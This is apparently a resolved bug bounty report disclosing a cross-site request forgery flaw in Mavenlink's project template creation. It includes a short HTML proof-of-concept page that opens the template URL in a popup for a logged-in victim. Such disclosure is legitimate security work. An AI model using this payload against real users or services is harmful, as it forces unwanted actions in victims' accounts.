CSRF Add user templates
Medium
M
Mavenlink
Submitted None
Actions:
Reported by
tolo7010
Vulnerability Details
Technical details and impact analysis
Reproduction:
==========
- Log in to account
- Visit CSRF page below (note default 30 seconds timeout, can be adjusted according to the connection speed):
```
<!doctype html>
<html>
<head>
</head>
<body>
<script>
var a = window.open("https://app.mavenlink.com/project_templates#new", "csrf", "height=100,width=100");
var intervalID = setTimeout(function () { a.close();}, 30000);
</script>
</body>
</html>
```
## Impact
CSRF Add user templates
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)